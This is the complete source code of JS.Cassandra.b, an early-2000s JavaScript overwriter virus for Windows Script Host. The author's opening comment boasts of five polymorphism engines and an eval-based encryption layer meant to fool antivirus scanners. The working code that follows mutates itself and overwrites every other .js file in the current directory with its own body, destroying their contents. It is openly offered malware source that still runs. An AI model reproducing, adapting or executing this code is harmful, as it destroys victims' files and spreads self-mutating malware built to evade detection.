Virus.JS.Cassandra.b - Source Code

1. /*  JS.Cassandra.b
2.   by Second Part To Hell[rRlf]
3.   www.spth.de.vu
4.   spth@aonmail.at
5.   written in 2003 and finished 2004
6.   Austria
7.  
8.   This is, as you may imagine, the second version of JS.Cassandra. It is a five-times
9.   polymorphic and sometimes encrypt JavaScript Overwriter. As you can see, the code is
10.   very complex (it has about 5kB). Well, now let's talk about the technique:
11.   --> Polymorphism engine I: Permutation
12.       The virus splits the whole file into chr(10,13) and but the parts randomly together.
13.       This technique allows 14! variants at the first generation. (Due to the randomness
14.       of the virus there are much more variants after some generations)
15.   --> Polymorphism engine II: Function Games
16.       The virus searchs for a '{' and 1/4 it makes a new function with the code between the
17.       '{' and the '}', and calls the new function.
18.   --> Polymorphism engine III: Add garbage code
19.       The virus spits the whole code into chr(10,13), than 1/2 it includes random garbage code
20.       after a line to the code. The garbage code don't do anything.
21.  
22.   --> Polymorphism engine IV: Variable/Function name Changing
23.       The virus changes 27 variable or function names, which makes the code look very different.
24.       The new variable-name has a size of 6-21 letters. The engine's size could be much smaller,
25.       but due to the other polymorphism engines it wasn't possible to make it as small as possible.
26.  
27.   --> Polymorphism engine V: Number Changine
28.       At execution the virus searchs for a number (chr(48-57)) and 1/6 changes the number to a full
29.       calculation like:
30.       (1+9)=10
31.       (13-3)=10
32.       (80/8)=10
33.       In combination with the encryption this polymorphism engine is very successful.
34.  
35.   --> Encryption engine:
36.       The virus changes the whole code to ASCII-code. And execute it via 'eval' after retransform it
37.       to real code via 'String.fromCharCode'. This is, in my opinion a very successful way to fake
38.       AVs. In compination with the Number Changine-Polymorphism-Engine it's much more successful
39.       than alone.
40.   Thanks goes to jackie for his JS.Opitz, which was the first JS-virus. I used some parts of it for
41.   the file-finding in this virus.
42.   End-Notes:
43.   It is very doubtful that I will write any other script-viruses anymore. As you can see, scripts don't
44.   have any big secrets for me. Hey, this is a five-times polymorph, sometimes encrypted and very complex
45.   JavaScript virus. What else shall I make? Well, it was fun writing this, but no real challenge. Therefor
46.   I will close now with the following words: 'byebye, scripts!'...
47.  
48. --------------------------------------------<([{  JS.Cassandra.b  }])>--------------------------------------------   /*
49.  cassandra()
50. function cassandra(){nextln=String.fromCharCode(13,10);code=varsd(2).OpenTextFile(varsd(1)).ReadAll();if(code.charAt(0)=='e'&&Math.round(Math.random()*3)==1){decryption()}if(code.charAt(0)!='e'){if(Math.round(Math.random()*3)==1){bodychange()}if(Math.round(Math.random()*2)==1){funcgame()}if(Math.round(Math.random()*2)==1){trash()}if(Math.round(Math.random()*2)==1){varchange()}}if(Math.round(Math.random()*14)==1){encryption()}numberchange()}
51. function varsd(varnum){ if(varnum==1){check=String.fromCharCode(87,83,99,114,105,112,116,46,83,99,114,105,112,116,70,117,108,108,78,97,109,101)}if(varnum==2){check=String.fromCharCode(87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,39,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,39,41,59,32)}return(eval(check))}
52. function funcgame(){code='';count=0;fcodn='';file=varsd(2).OpenTextFile(varsd(1)).ReadAll();for(i=0;i<file.length;i++){check=0;if(file.charCodeAt(i)==123&&Math.round(Math.random()*3)==1){if(file.charCodeAt(i+1)!=32){foundit();check=1;}}if(!check){code+=file.charAt(i)}}varsd(2).OpenTextFile(varsd(1),2).Write(code+fcodn)}
53. function foundit(){fcoda='';count=0;randon='';for(j=i;j<file.length;j++){if(file.charCodeAt(j)==123){count++}if(file.charCodeAt(j)==125){count--}if(!count){fcoda=file.substring(i+1,j);j=file.length}}for(j=0;j<Math.round(Math.random()*5)+4;j++){randon+=String.fromCharCode(Math.round(Math.random()*25)+97)}fcodn+=nextln+'function '+randon+'()'+String.fromCharCode(123)+fcoda+String.fromCharCode(125);code+=String.fromCharCode(123)+' '+randon+'()';i+=fcoda.length}
54. function trash(){code='';cote=varsd(2).OpenTextFile(varsd(1)).ReadAll().split(String.fromCharCode(13,10));file=varsd(2).OpenTextFile(varsd(1));for(i=0;i<cote.length;i++){if(cote[i].charAt(0)!='/'&&cote[i].charAt(0)!='v'&&cote[i].charAt(0)!='i'&&cote[i].substring(0,2)!='fo'){code+=cote[i]+nextln}trasname();nameb=namea;trasname();check=Math.round(Math.random()*8);if(check==1){code+='var '+namea+'='+String.fromCharCode(39)+nameb+String.fromCharCode(39)+nextln}if(check==1){code+='// '+namea+nextln}if(check==2){code+='var '+namea+'='+Math.round(Math.random()*9999999)+nextln}if(check==3){code+='if('+Math.round(Math.random()*9999)+'=='+Math.round(Math.random()*9999)+')'+String.fromCharCode(123)+namea+'()'+String.fromCharCode(125)+nextln}if(check==4){code+='for('+namea+'=0;'+namea+'>'+Math.round(Math.random()*9999)+';'+namea+'++)'+String.fromCharCode(123)+nameb+'()'+String.fromCharCode(125)+nextln}}file=varsd(2).OpenTextFile(varsd(1),2).Write(code)}
55. function trasname(){namea='';for(j=0;j<Math.round(Math.random()*15)+5;j++){namea+=String.fromCharCode(Math.round(Math.random()*25)+97)}}
56. function numberchange(){code='';file=varsd(2).OpenTextFile(varsd(1)).ReadAll();for(i=0;i<file.length;i++){if(file.charCodeAt(i)>47&&file.charCodeAt(i)<58){findfullnumber()}else{code+=file.charAt(i)}}varsd(2).OpenTextFile(varsd(1),2).Write(code);infectit()}
57. function findfullnumber(){numbber='';for(j=i;j<file.length;j++){if(file.charCodeAt(j)>47&&file.charCodeAt(j)<58){numbber+=file.charAt(j)}else{j=file.length}}if(Math.round(Math.random()*6)==1){random=Math.round(Math.random()*2);randon=Math.round(Math.random()*10)+1;if(random==0){code+='('+(numbber-randon)+'+'+randon+')'}if(random==1){code+='('+(numbber/1+randon)+'-'+randon+')'}if(random==2){code+='('+(numbber*randon)+'/'+randon+')'}}else{code+=numbber}i+=numbber.length-1}
58. function infectit(){infdir=varsd(2).GetFolder(varsd(2).GetFolder('.'));inffil=new Enumerator(infdir.Files);for(;!inffil.atEnd();inffil.moveNext()){if(varsd(2).GetExtensionName(inffil.item()).toUpperCase()=='JS'&&inffil.item()!=varsd(1)){varsd(2).OpenTextFile(inffil.item(),2).Write(code)}}}
59. function bodychange(){file=varsd(2).OpenTextFile(varsd(1)).ReadAll().split(String.fromCharCode(13,10));code=file.splice(0,1)+nextln;for(;file.length>0;){code+=file.splice(Math.round(Math.random()*file.length),1)+nextln;}varsd(2).OpenTextFile(varsd(1),2).Write(code)}
60. function varchange(){code=varsd(2).OpenTextFile(varsd(1)).ReadAll();cvar=new Array('bodychange','cassandra','check','code','cote','count','decryption','encryption','fcoda','fcodn','file','findfullnumber','foundit','funcgame','infectit','infdir','inffil','namea','nameb','nextln','numberchange','randon','trash','trasname','varchange','varnum','varsd');for(i=0;i<cvar.length;i++){trasname();for(j=0;j<code.length;j++){code=code.replace(cvar[i],namea);if(code.indexOf(cvar[i])==-1){j=code.length;}}}varsd(2).OpenTextFile(varsd(1),2).Write(code)}
61. function encryption(){file=varsd(2).OpenTextFile(varsd(1)).ReadAll();code='eval(String.fromCharCode('+file.charCodeAt(0);for(i=1;i<file.length;i++){code+=','+file.charCodeAt(i)}code+='))';varsd(2).OpenTextFile(varsd(1),2).Write(code)}
62. function decryption(){code='';file=varsd(2).OpenTextFile(varsd(1)).ReadAll();file=file.substring(25,file.length-2);file=file.split(',');for(i=0;i<file.length;i++){code+=String.fromCharCode(eval(file[i]))}varsd(2).OpenTextFile(varsd(1),2).Write(code)}
63.